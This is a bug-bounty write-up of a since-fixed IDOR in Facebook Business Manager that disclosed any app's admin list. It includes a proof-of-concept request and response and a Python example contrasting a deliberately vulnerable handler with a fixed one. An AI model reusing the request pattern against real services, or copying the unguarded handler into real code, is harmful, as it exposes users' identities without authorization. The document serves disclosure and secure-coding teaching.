Disclose Full Admin List of any Facebook Applications
Facebook Business Manager has an endpoint that fetches the admin list for assets such as pages, apps and other asset types. The call was properly access-controlled for Facebook Pages, but not for the asset type apps.
An IDOR (Insecure Direct Object Reference) vulnerability allowed fetching the admin list of any Facebook Application, regardless of whether the app was assigned to the attacker's Business Manager account; the ownership check was simply not enforced for apps.
Proof of concept
Request:
POST /business/aymc_assets/admins/ HTTP/1.1
Host: business.facebook.com

asset_ids[0]=TARGET_APP_ID&business_id=ATTACKER_BUSINESS_ID
Response:
{
  "__ar": 1,
  "payload": {
    "assetAdmins": {
      "__imm": {
        "method": "Map",
        "value": [
          ["123456789", {
            "name": "fname lname",
            "id": "123456789",
            "iconURI": "/images/assets_DO_NOT_HARDCODE/facebook_icons/badge-admin_outline_20_fds-black.png",
            "isSelected": true,
            "isSelectionDisabled": false,
            "secondaryInfo": "FACEBOOK APP NAME"
          }],
          ["123456789xxN", {
            "name": "Admin N",
            "id": "123456789xxN",
            "iconURI": "/images/assets_DO_NOT_HARDCODE/facebook_icons/badge-admin_outline_20_fds-black.png",
            "isSelected": true,
            "isSelectionDisabled": false,
            "secondaryInfo": "FACEBOOK APP NAME"
          }]
        ]
      }
    }
  }
}
Impact
This could have let a malicious user disclose the admin/developer list of any Facebook app.
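The root cause described above is an authorization check that was applied to one asset type (pages) but skipped for another (apps). The following is an added example, not Facebook's code, of what such a handler looks like before and after the fix. The business and asset identifiers, the `BUSINESS_ASSETS`/`ASSET_ADMINS` tables and the function names are assumptions constructed for illustration; the point is that ownership must be verified for every requested asset, of every type, against the calling business.

```python
# Added example (not Facebook's code): a server-side ownership check that
# closes the IDOR described in the write-up. All data below is constructed.

# Constructed sample data: which assets each business owns, keyed by
# (asset_type, asset_id), and which users administer each asset.
BUSINESS_ASSETS = {
    "business-attacker": {("page", "page-1")},
    "business-victim": {("app", "app-42"), ("page", "page-9")},
}
ASSET_ADMINS = {
    ("app", "app-42"): ["admin-alice", "admin-bob"],
    ("page", "page-1"): ["admin-carol"],
    ("page", "page-9"): ["admin-dave"],
}


class Forbidden(Exception):
    """Raised when the calling business is not allowed to see an asset."""


def _owned_by(business_id):
    return BUSINESS_ASSETS.get(business_id, set())


def admins_vulnerable(business_id, asset_type, asset_ids):
    """Mirrors the reported bug: the ownership check only runs for pages,
    so any app id is accepted regardless of the business_id supplied."""
    result = {}
    for asset_id in asset_ids:
        key = (asset_type, asset_id)
        if asset_type == "page" and key not in _owned_by(business_id):
            raise Forbidden("page not assigned to this business")
        # For apps the lookup happens with no authorization at all.
        result[asset_id] = list(ASSET_ADMINS.get(key, []))
    return result


def admins_fixed(business_id, asset_type, asset_ids):
    """Hardened handler: every requested asset, whatever its type, must be
    assigned to the calling business. The whole batch is authorized before
    any admin data is collected, so a mixed request cannot leak partial
    results, and an unowned id and a non-existent id get the same error,
    so the endpoint cannot be used to probe which ids exist."""
    owned = _owned_by(business_id)
    keys = [(asset_type, asset_id) for asset_id in asset_ids]
    for key in keys:
        if key not in owned:
            raise Forbidden("asset not assigned to this business")
    return {asset_id: list(ASSET_ADMINS.get(key, []))
            for (asset_type, asset_id), key in zip(keys, keys)}


if __name__ == "__main__":
    # A business asking for admins of an app it does not own: the
    # vulnerable handler answers, the fixed one refuses.
    print(admins_vulnerable("business-attacker", "app", ["app-42"]))
    try:
        admins_fixed("business-attacker", "app", ["app-42"])
    except Forbidden as exc:
        print("fixed handler refused:", exc)
    # The legitimate owner still gets its data.
    print(admins_fixed("business-victim", "app", ["app-42"]))
```

The shape to look for in review is the asymmetric check in `admins_vulnerable`: an `if asset_type == "page"` guard around the authorization means every other branch is unauthenticated by default. Putting the check in one place that runs for all types, as `admins_fixed` does, removes that class of mistake.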
Timeline
- 25 Dec, 2018 – Report Sent.
- 04 Jan, 2019 – Escalation by Facebook.
- 08 Jan, 2019 – Fixed by Facebook.
- 27 Mar, 2019 – Bounty Awarded by Facebook.